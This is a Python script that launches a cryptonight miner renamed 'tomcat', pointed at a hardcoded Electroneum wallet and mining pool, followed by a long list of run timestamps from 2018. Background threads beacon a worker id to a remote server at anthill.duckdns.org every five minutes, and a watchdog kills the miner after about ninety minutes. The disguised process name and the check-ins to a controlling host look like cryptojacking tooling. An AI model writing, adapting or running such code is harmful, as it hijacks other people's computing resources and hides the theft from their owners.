import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:16:01.598721
#2018-02-17 16:03:03.925797
#2018-02-17 17:49:05.721640
#2018-02-17 19:37:03.556502
#2018-02-17 21:27:03.977559
#2018-02-17 23:11:01.990105
#2018-02-18 00:57:06.113916
#2018-02-18 02:45:07.831005
#2018-02-18 04:35:07.523464
#2018-02-18 06:26:05.259921
#2018-02-18 08:15:03.134192
#2018-02-18 10:03:06.017982
#2018-02-18 11:50:06.965120
#2018-02-18 13:35:03.969740
#2018-02-18 15:24:07.987946
#2018-02-18 17:14:01.696072
#2018-02-18 19:02:01.756590
#2018-02-18 20:49:01.605945
#2018-02-18 22:34:04.205200
#2018-02-19 00:22:04.168146
#2018-02-19 02:08:04.536280
#2018-02-19 03:55:08.498495
#2018-02-19 05:41:05.186403
#2018-02-19 07:29:04.170597
#2018-02-19 09:19:05.097429
#2018-02-19 11:08:09.148805
#2018-02-19 12:55:10.755460
#2018-02-19 14:42:06.494417
#2018-02-19 16:29:01.252921
#2018-02-19 18:15:08.110716
#2018-02-19 20:03:01.776278
#2018-02-19 21:52:03.736666
#2018-02-19 23:37:08.048648
#2018-02-20 01:24:06.465176
#2018-02-20 03:14:04.400134
#2018-02-20 05:01:01.411580
#2018-02-20 06:43:04.193593
#2018-02-20 08:28:07.017684
#2018-02-20 10:13:06.128995
#2018-02-20 11:57:04.443528
#2018-02-20 13:44:07.365643
#2018-02-20 15:29:02.185267
#2018-02-20 17:14:05.365270
#2018-02-20 19:04:05.285933
#2018-02-20 20:54:05.189899
#2018-02-20 22:40:08.293732
#2018-02-21 00:24:07.070862
#2018-02-21 02:11:04.277750
#2018-02-21 03:57:04.832415
#2018-02-21 05:44:01.808140
#2018-02-21 07:32:08.244801
#2018-02-21 09:17:06.527042
#2018-02-21 11:06:08.137541
#2018-02-21 12:54:07.428843
#2018-02-21 14:43:06.871630
#2018-02-21 16:31:05.096135
#2018-02-21 18:21:05.514070
#2018-02-21 20:06:08.605136
#2018-02-21 21:54:08.140010
#2018-02-21 23:39:01.315580
#2018-02-22 01:28:02.112087
#2018-02-22 03:17:04.653478
#2018-02-22 05:04:07.860004
#2018-02-22 06:47:05.306714
#2018-02-22 08:35:05.454494
#2018-02-22 10:22:07.385732
#2018-02-22 12:08:05.552273
#2018-02-22 13:53:06.782602
#2018-02-22 15:40:11.470180
#2018-02-22 17:26:07.575610
#2018-02-22 19:14:04.004664
#2018-02-22 21:06:08.897539
#2018-02-22 22:50:07.143375
#2018-02-23 00:37:05.193959
#2018-02-23 02:25:09.083267
#2018-02-23 04:15:01.395312
#2018-02-23 05:59:01.562876
#2018-02-23 07:32:04.940539
#2018-02-23 09:33:01.570030
#2018-02-23 11:18:08.858330
#2018-02-23 12:35:08.345806
#2018-02-23 14:00:11.469099
#2018-02-23 15:36:05.322156
#2018-02-23 17:09:07.923369
#2018-02-23 18:34:08.215972
#2018-02-23 20:15:09.630047
#2018-02-23 21:48:01.417893
#2018-02-23 23:26:06.546202
#2018-02-24 00:58:06.779269
#2018-02-24 02:43:05.436232
#2018-02-24 04:19:05.838354
#2018-02-24 05:48:02.176795
#2018-02-24 07:23:05.512445
#2018-02-24 08:58:06.779216
#2018-02-24 10:36:06.197011
#2018-02-24 12:23:05.476670
#2018-02-24 13:56:04.631544
#2018-02-24 15:28:07.257561
#2018-02-24 17:04:03.871538
#2018-02-24 18:36:02.068443
#2018-02-24 20:07:04.253327
#2018-02-24 21:38:01.833636
#2018-02-25 00:10:04.209140
#2018-02-25 02:17:07.256711
#2018-02-25 06:01:07.557298
#2018-02-25 11:39:04.375495